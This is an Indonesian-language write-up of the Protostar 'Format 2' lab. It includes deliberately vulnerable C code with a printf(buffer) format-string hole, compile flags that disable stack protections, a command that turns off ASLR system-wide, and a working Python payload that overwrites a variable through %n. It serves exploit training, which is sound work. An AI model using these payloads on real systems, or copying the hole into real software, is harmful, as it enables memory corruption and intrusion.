Protostar Format 2

Alat dan Bahan

• Fail: vuln.c
• Kompiler: GCC
• Sistem operasi: Ubuntu 16.04 dengan arsitektur 64 bit.

Mengatur Lingkungan Pekerjaan

1. Source Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);

  if(target == 64) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

1. Kompilasi

gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=4 -o vuln -ggdb vuln.c

Penjelasan

-m32
Kompilasi source code menjadi binary dengan arsitektur 32 bit atau x86.

-fno-stack-protector
Kompilasi source code menjadi binary tanpa pelindung stack (canary).

-z execstack
Berguna mengaktifkan status stack agar dapat dieksekusi

-mpreferred-stack-boundary
Pada dasarnya, GCC akan mengkompilasi kode pada setiap fungsi sesuai urutan, masing-masing memiliki stack pointer dengan alinea 16-byte bondary (ini sangat penting jika program memiliki variabel lokal dan bisa juga digunakan untuk mengaktifkan instruksi sse2.
Jika parameter dirubah menjadi -mpreferred-stack-boundary=2 maka GCC akan menyusun stack pointer pada 4-byte-boundary. Ini akan menguangi kebutuhan stack didalam program, tetapi akan terjadi crash jika kode program yang dipanggil menggunakan sse2, sehingga secara umum menjadi program hasil kompilasi menjadi tidak aman.

-ggdb
Digunakan untuk menghasilkan informasi pada saat proses debugging ketika menggunakan GDB. Dengan kata lain format ekspresif telah disediakan (DWARF 2, stabs, atau fomat native lainnya jika tidak didukung), termasuk ekstensi GDB.

1. Mematikan ASLR

Matikan ASLR agar proses eksploitasi lebih mudah. Untuk mematikannya gunakan perintah berikut:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Identifikasi Kelemahan

Berdasarkan source code diatas terdapat kelemahan format string pada fungsi printf. Tujuan akhirnya adalah menimpa variabel target dengan nilai 64. Informasi yang diperlukan adalah mengatur isi arbitrary memory pada lokasi yang dinginkan dengan dengan buffer sejumlah 64 bytes.

Lokasi yang diinginkan adalah alamat variabel target.

objdump -t vuln | grep target
0804a048 g O .bss 00000004 target

Mencari jumlah bytes yang tepat untuk menimpa variabel target.

python -c "print 'AAAA'+'\x48\xa0\x04\x08'+'%x.'*3+'%x'+'%n'" | ./vuln
...

target is 38 :(

Masing kurang sekitar 26 bytes, karena buffer awal berjumlah 8 bytes maka perlu ditambah sekitar 34 bytes lagi.

Eksploitasi

Untuk menyelesaikannya, gunakan %34x untuk menambahkan jumlah *buffer.

python -c "print 'AAAA'+'\x48\xa0\x04\x08'+'%x.'*3+'%34x'+'%n'" | ./vuln
...
you have modified the target :)

Referensi

• https://www.mattandreko.com/2012/01/31/exploit-exercises-protostar-format-2/
• https://exploit-exercises.com/protostar/format2/